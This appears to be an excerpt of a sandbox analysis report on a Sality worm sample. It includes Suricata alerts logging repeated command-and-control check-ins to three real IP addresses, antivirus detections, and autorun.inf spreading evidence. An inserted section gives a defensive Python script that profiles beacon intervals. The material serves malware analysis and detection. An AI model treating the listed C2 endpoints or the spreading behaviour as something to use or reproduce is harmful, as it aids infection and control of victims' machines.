2024-10-18T12:43:45.144872+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50001 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:49.504205+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50007 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:51.117597+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50027 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:55.528705+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50028 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:57.133083+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50029 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:01.393948+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50030 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:03.034471+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50032 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:07.519217+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50033 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:09.073539+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50034 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:13.364041+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50035 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:14.966939+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50036 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:19.380085+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50037 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:20.972483+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50038 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:25.769055+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50039 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:27.259821+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50040 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:32.108634+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50041 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:34.003474+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50042 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:38.544056+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50043 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:40.244422+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50044 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:44.568350+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50045 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:47.270315+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50046 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:51.551466+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50048 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:53.223461+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50049 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:57.651692+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50050 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:59.153333+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50051 | 185.53.178.50 | 80 | TCP
2024-10-18T12:45:03.284445+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50052 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:04.962592+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50053 | 185.53.178.50 | 80 | TCP
2024-10-18T12:45:09.512490+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50054 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:11.224026+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50055 | 185.53.178.50 | 80 | TCP
2024-10-18T12:45:15.957815+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50056 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:17.699821+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50057 | 185.53.178.50 | 80 | TCP
2024-10-18T12:45:21.957273+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50058 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:23.641333+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50059 | 185.53.178.50 | 80 | TCP
2024-10-18T12:45:27.761668+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50060 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:29.317116+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50061 | 185.53.178.50 | 80 | TCP
2024-10-18T12:45:33.753048+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50062 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:36.073156+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50064 | 185.53.178.50 | 80 | TCP
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-18T12:41:34.975221+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49707 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:41:39.935484+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49709 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:41:41.407737+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49712 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:41:49.368405+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49716 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:41:53.402228+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49719 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:41:55.419204+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49721 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:41:59.701403+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49722 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:01.531631+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49723 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:42:06.031031+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49724 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:07.602990+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49725 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:42:11.645323+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49726 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:13.239676+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49727 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:42:17.298575+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49728 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:18.602435+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49729 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:42:22.644756+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49730 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:24.726632+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49731 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:42:28.989555+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49732 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:30.465354+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49735 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:42:34.518806+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49736 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:36.979019+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49737 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:42:41.055615+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49738 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:42.705591+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49740 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:42:47.487267+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49741 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:49.865347+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49759 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:42:54.346733+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49767 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:42:56.008076+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49784 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:00.351728+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49789 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:01.755354+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49806 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:05.816068+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49814 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:07.131282+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49835 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:11.408873+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49842 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:12.995616+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49861 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:17.555326+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49870 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:19.906299+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49889 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:23.986856+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49899 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:25.649318+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49918 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:31.472599+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49927 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:33.227599+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49949 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:37.472929+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49955 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:39.087157+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49977 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:43.404850+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49983 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:45.144872+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50001 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:49.504205+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50007 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:51.117597+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50027 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:43:55.528705+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50028 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:43:57.133083+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50029 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:01.393948+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50030 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:03.034471+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50032 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:07.519217+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50033 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:09.073539+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50034 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:13.364041+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50035 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:14.966939+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50036 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:19.380085+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50037 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:20.972483+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50038 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:25.769055+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50039 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:27.259821+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50040 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:32.108634+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50041 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:34.003474+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50042 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:38.544056+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50043 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:40.244422+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50044 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:44.568350+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50045 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:47.270315+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50046 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:51.551466+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50048 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:53.223461+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50049 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:44:57.651692+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50050 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:44:59.153333+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50051 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:45:03.284445+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50052 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:45:04.962592+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50053 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:45:09.512490+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50054 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:45:11.224026+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50055 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:45:15.957815+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50056 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:45:17.699821+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50057 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:45:21.957273+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50058 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:45:23.641333+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50059 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:45:27.761668+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50060 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:45:29.317116+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50061 | 185.53.178.50 | 80 | TCP
        2024-10-18T12:45:33.753048+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50062 | 190.120.227.91 | 8080 | TCP
        2024-10-18T12:45:36.073156+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 50064 | 185.53.178.50 | 80 | TCP
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-18T12:42:31.392262+0200 | 2816165 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49733 | 194.5.152.215 | 80 | TCP
        2024-10-18T12:43:18.923435+0200 | 2816165 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49867 | 194.5.152.215 | 80 | TCP
        2024-10-18T12:44:05.202534+0200 | 2816165 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50031 | 194.5.152.215 | 80 | TCP
        2024-10-18T12:44:53.017759+0200 | 2816165 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50047 | 194.5.152.215 | 80 | TCP
        2024-10-18T12:45:38.986659+0200 | 2816165 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50063 | 194.5.152.215 | 80 | TCP
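The alert tables above, and the per-connection Suricata lines in the Networking section further down, show one pattern: check-ins to 185.53.178.50:80 and 190.120.227.91:8080 alternating roughly every six seconds, and to 194.5.152.215:80 roughly every 47 seconds. The Python below is an added example, not part of the Joe Sandbox report, that turns such alerts into a per-destination beacon profile: it parses Suricata EVE JSON alert events, collapses the duplicate timestamps that appear when two rules (here 2018340 and 2803270) fire on the same connection, and flags destinations whose check-in interval is regular. The sample events are constructed: the timestamps and endpoints are copied from the tables, while 203.0.113.7:443 and SID 9000001 are made-up controls, and the thresholds (at least four check-ins, coefficient of variation at or below 0.2) are tuning assumptions.

```python
"""Beacon-interval profiling over Suricata EVE alerts (added example, not code from the report)."""
import json
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample: timestamps and endpoints copied from the report's Suricata alert tables,
# re-encoded as minimal EVE JSON alert events. 203.0.113.7 (TEST-NET-3) with the made-up
# local-rule SID 9000001 is a non-periodic control that does not appear in the report.
_EVENTS = [
    ("2024-10-18T12:44:40.244422+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:44:40.244422+0200", "185.53.178.50", 80, 2803270),  # same connection, second rule
    ("2024-10-18T12:44:47.270315+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:44:53.223461+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:44:59.153333+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:45:04.962592+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:45:11.224026+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:45:17.699821+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:45:23.641333+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:45:29.317116+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:45:36.073156+0200", "185.53.178.50", 80, 2018340),
    ("2024-10-18T12:42:31.392262+0200", "194.5.152.215", 80, 2816165),
    ("2024-10-18T12:43:18.923435+0200", "194.5.152.215", 80, 2816165),
    ("2024-10-18T12:44:05.202534+0200", "194.5.152.215", 80, 2816165),
    ("2024-10-18T12:44:53.017759+0200", "194.5.152.215", 80, 2816165),
    ("2024-10-18T12:45:38.986659+0200", "194.5.152.215", 80, 2816165),
    ("2024-10-18T12:41:00.000000+0200", "203.0.113.7", 443, 9000001),  # constructed control
    ("2024-10-18T12:41:02.000000+0200", "203.0.113.7", 443, 9000001),
    ("2024-10-18T12:41:32.000000+0200", "203.0.113.7", 443, 9000001),
    ("2024-10-18T12:41:37.000000+0200", "203.0.113.7", 443, 9000001),
    ("2024-10-18T12:42:37.000000+0200", "203.0.113.7", 443, 9000001),
]
SAMPLE_EVE_LINES = [
    json.dumps({"timestamp": ts, "event_type": "alert", "src_ip": "192.168.2.9",
                "dest_ip": ip, "dest_port": port, "proto": "TCP",
                "alert": {"signature_id": sid, "severity": 1}})
    for ts, ip, port, sid in _EVENTS
] + ['{"event_type": "flow", "dest_ip": "185.53.178.50"}', "not json at all"]  # noise to skip


def parse_eve_alerts(lines):
    """Yield (dest, sid, timestamp) for well-formed alert events; skip everything else."""
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if ev.get("event_type") != "alert":
            continue
        ts = datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
        yield f'{ev["dest_ip"]}:{ev["dest_port"]}', ev["alert"]["signature_id"], ts


def beacon_profile(lines, min_events=4, max_cv=0.2):
    """Per destination: distinct check-ins, mean interval, CV (stdev/mean), rule SIDs, verdict.

    Several rules firing on one connection yield identical timestamps; these are collapsed
    first, otherwise the zero-length gaps distort the interval statistics. A destination is
    flagged when it has at least min_events distinct check-ins and CV <= max_cv.
    """
    stamps, sids = defaultdict(set), defaultdict(set)
    for dest, sid, ts in parse_eve_alerts(lines):
        stamps[dest].add(ts)
        sids[dest].add(sid)
    profile = {}
    for dest, seen in stamps.items():
        ordered = sorted(seen)
        gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
        entry = {"events": len(ordered), "sids": sorted(sids[dest]), "beaconing": False}
        if len(ordered) >= min_events:
            mean = statistics.fmean(gaps)
            cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
            entry.update(mean_interval_s=round(mean, 2), cv=round(cv, 3), beaconing=cv <= max_cv)
        profile[dest] = entry
    return profile


if __name__ == "__main__":
    for dest, info in sorted(beacon_profile(SAMPLE_EVE_LINES).items()):
        print(dest, info)
```

Run it directly to print one profile per destination; on a live sensor feed the same function over the lines of eve.json. Sality's short fixed interval makes this an easy case; beacons with deliberate jitter need a wider CV tolerance or a different regularity statistic, and the four-check-in minimum exists only to stop a single retry pair from being scored.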

        AV Detection

        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Avira: detected
        Source: C:\Users\user\AppData\Local\Temp\winfpnht.exe | Avira: detection malicious, Label: W32/Sality.AT
        Source: C:\Users\user\AppData\Local\Temp\rckc.exe | Avira: detection malicious, Label: W32/Sality.AT
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | ReversingLabs: Detection: 94%
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | ReversingLabs: Detection: 94%
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\winfpnht.exe | Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\rckc.exe | Joe Sandbox ML: detected
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Code function: 18_2_0040655C wcslen,CryptBinaryToStringW | 18_2_0040655C
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: sedSmibSjDOiaD.exe, 0000002E.00000000.3877127117.0000000000A9E000.00000002.00000001.01000000.0000000A.sdmp

        Spreading

        Source: Yara match | File source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpack, type: UNPACKEDPE
        Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe PID: 1376, type: MEMORYSTR
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | File created: C:\autorun.inf
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: z:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: y:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: x:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: w:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: v:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: u:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: t:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: s:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: r:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: q:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: p:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: o:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: n:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: m:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: l:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: k:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: j:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: i:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: h:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: g:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: f:
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File opened: e:
        Source: C:\Windows\SysWOW64\netsh.exe | File opened: c:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Binary or memory string: [AutoRun]
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Binary or memory string: autorun.inf
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.000000000094F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005FB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\autorun.inf3
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005FB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\autorun.inf
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005FB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\autorun.infP3
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005FB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.inf
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714592262.000000000515C000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: [autorun]
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: [AutoRun]
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: autorun.inf
